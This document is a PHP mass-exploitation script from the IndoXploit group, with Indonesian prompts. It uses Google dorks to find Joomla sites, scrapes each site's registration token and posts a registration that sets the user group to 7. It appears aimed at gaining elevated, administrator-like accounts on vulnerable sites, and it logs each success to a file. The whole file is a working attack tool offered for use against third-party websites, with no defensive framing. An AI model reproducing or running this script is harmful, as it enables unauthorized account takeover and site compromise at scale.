com_user

1. <?php
2. /*
3. Coded by RieqyNS13
4. Thx to DC, HN, indoXploit
5. */
6. class auto{
7. private $url;
8. private $dork;
9. private $username;
10. private $password;
11. private $email;
12. private $log=null;
13. function __construct($file=null){
14. echo "\n\n ########## IndoXploit Coders Team ##########\n";
15. echo "######### indoXploit.org | Hacker-Newbie.org #########\n\n";
16. echo "/*Auto Get Token and auto register com_user*/\n\n";
17. echo "[+]Masukkan Dork: ";
18. $fp = fopen("php://stdin", "rb");
19. $dork = fgets($fp);
20. $dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
21. echo "[+]Masukkan jumlah situs yg discan: ";
22. $total = fgets($fp);
23. $total = str_replace(array("\n", "\r", "\r\n"), "", $total);
24. echo "[+]Masukkan Username: ";
25. $username = fgets($fp);
26. $username = str_replace(array("\n", "\r", "\r\n"), "", $username);
27. echo "[+]Masukkan password: ";
28. $password = fgets($fp);
29. $password = str_replace(array("\n", "\r", "\r\n"), "", $password);
30. echo "[+]Masukkan email: ";
31. $email = fgets($fp);
32. $email = str_replace(array("\n", "\r", "\r\n"), "", $email);
33. fclose($fp);
34. $this->dork = $dork;
35. $this->username = $username;
36. $this->password = $password;
37. $this->email = $email;
38. $this->total = $total;
39. $this->log = $file;
40. $this->scan();
41. }
42. function match($start, $end, $var){
43. return preg_match_all("{".preg_quote($start).'(.*?)'.preg_quote($end)."}is", $var, $m) ? $m[1] : null;
44. }
45. function curl($dork=null, $x, $url=null){
46. $ch = curl_init();
47. if($dork != null && is_numeric($x)){
48. curl_setopt($ch, CURLOPT_URL, "http://www.google.com/custom?q=".urlencode($dork)."&btnG=Search&start=".urlencode($x));
49. }elseif($url != null && $x==null){
50. curl_setopt($ch, CURLOPT_URL, $url);
51. }
52. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
53. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
54. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
55. curl_setopt($ch, CURLOPT_AUTOREFERER, true );
56. curl_setopt($ch, CURLOPT_FAILONERROR, true);
57. $exec = curl_exec($ch);
58. curl_close($ch);
59. return $exec;
60. }
61. function save($url){
62. if($this->log != null){
63. $fp = @fopen($this->log, "a") or die("cant open file");
64. fwrite($fp, $url);
65. fclose($fp);
66. }else return false;
67. }
68. function parse($urls){
69. for($a=0; $a<count($urls); $a++){
70. $dev = parse_url($urls[$a]);
71. @$scheme[] = $dev['scheme'];
72. @$host[] = $dev['host'];
73. }
74. $unik = array_unique($host);
75. foreach($unik as $key=>$url){
76. $urls_[] = $scheme[$key]."://".$url;
77. }
78. return $urls_;
79. }
80. function waktu($start){
81. $end = time() - $start;
82. $detik = round($end);
83. echo "\n~selesai dalam {$detik} detik\n";
84. }
85. function scan(){
86. $start=0;
87. $total=0;
88. $mulai = time();
89. function ambil($param, $kata1, $kata2){
90. if(strpos($param, $kata1) === FALSE) return FALSE;
91. if(strpos($param, $kata2) === FALSE) return FALSE;
92. $start = strpos($param, $kata1) + strlen($kata1);
93. $end = strpos($param, $kata2, $start);
94. $return = substr($param, $start, $end - $start);
95. return;}
96. do{
97. $i=0;
98. $data = $this->curl($this->dork, $start);
99. $urls = $this->match('<a class="l" href="', '" onmousedown="', $data);
100. if($urls==null){
101. echo "~hasil tidak ada\n";
102. $this->waktu($mulai);
103. exit;
104. }
105. $urls_ = $this->parse($urls);
106. $count = count($urls_);
107. if($count==0){
108. echo "hasil tidak ada atau ada halangan captcha :p\n~keluar";
109. $this->waktu($mulai);
110. exit;
111. }
112.  
113. do{
114. $urlq = $urls_[$i];
115. $url_ = $urlq."/index.php?option=com_users&view=registration";
116. $scan = $this->curl(null, null, $url_);
117. echo "\n";
118. echo $urlq;
119. if(preg_match('#jform_password1#is', $scan)){
120. echo "\n";
121. echo "-> wait...";
122. echo "\n";
123.  
124. $ch4 = curl_init ("$urlq/index.php?option=com_users&view=registration");
125. curl_setopt ($ch4, CURLOPT_RETURNTRANSFER, 1);
126. curl_setopt ($ch4, CURLOPT_FOLLOWLOCATION, 1);
127. curl_setopt ($ch4, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
128. curl_setopt ($ch4, CURLOPT_CONNECTTIMEOUT, 5);
129. curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
130. curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
131. curl_setopt($ch4, CURLOPT_COOKIEJAR,'coker_log');
132. curl_setopt($ch4, CURLOPT_COOKIEFILE,'coker_log');
133. $data = curl_exec ($ch4);
134.  
135. preg_match('/<input type="hidden" name="(.*?)" value="1"/', $data, $f);
136. $token = $f[1];
137.  
138. $post = array(
139. 'jform[name]' => "Hendragunnawan",
140. 'jform[username]' => "Hendragunnawan",
141. 'jform[password1]' => "Tu5b0l3d",
142. 'jform[password2]' => "asasssssssss",
143. 'jform[email1]' => "tu5b0l3d@gmail.com",
144. 'jform[email2]' => "tu5b0l3d@gmail.com",
145. 'jform[groups][]' => "7",
146. 'option' => "com_users",
147. 'task' => "registration.register",
148. "$token"=> "1",
149. );
150.  
151. $ch2 = curl_init ("$urlq/index.php/component/users/?view=registration");
152. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
153. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
154. curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
155. curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT, 5);
156. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
157. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
158. curl_setopt ($ch2, CURLOPT_POST, 1);
159. @curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
160. curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
161. curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
162. $data3 = curl_exec ($ch2);
163.  
164. if(preg_match('#jform_password1#is', $data3)){
165. echo "-> lagi register ";
166. echo "\n";
167.  
168. $post = array(
169. 'jform[name]' => "Hendragunnawan",
170. 'jform[username]' => "$this->username",
171. 'jform[password1]' => "$this->password",
172. 'jform[password2]' => "$this->password",
173. 'jform[email1]' => "$this->email",
174. 'jform[email2]' => "$this->email",
175. 'jform[groups][]' => "7",
176. 'option' => "com_users",
177. 'task' => "registration.register",
178. "$token"=> "1",
179. );
180.  
181. $ch2 = curl_init ("$urlq/index.php/component/users/?view=registration");
182. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
183. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
184. curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
185. curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT, 5);
186. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
187. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
188. curl_setopt ($ch2, CURLOPT_POST, 1);
189. @curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
190. curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
191. curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
192. $data1 = curl_exec ($ch2);
193.  
194.  
195. //$ceks = ambil($data1,'<div class="com-user ',' ">');
196. //if($ceks == "registration-complete"){
197.  
198. if(preg_match('#Your account has been created#is', $data1)){
199. echo "\n";
200. echo "-> Success";
201. echo "\n";
202. echo "-> Cek Email";
203. echo "\n";
204. echo "\n";
205. $this->save($urlq."<br>");
206. }else{
207. echo "-> Gagal Daftar";
208. echo "\n";
209. echo "\n";
210. }
211.  
212.  
213. }else {
214. echo "-> Ngk Bisa Register ";
215. echo "\n";
216. }
217. }
218. else {
219. echo "-> Not Vuln";
220. echo "\n";
221. }
222.  
223.  
224.  
225.  
226.  
227.  
228. $total++;
229. $i++;
230. }while($i<$count && $total<$this->total);
231. $start=$start+10;
232. }while($total<$this->total);
233. $this->waktu($mulai);
234.  
235. }
236.  
237. }
238.  
239. $gay = new auto("vuln-com_user.htm");
240. ?>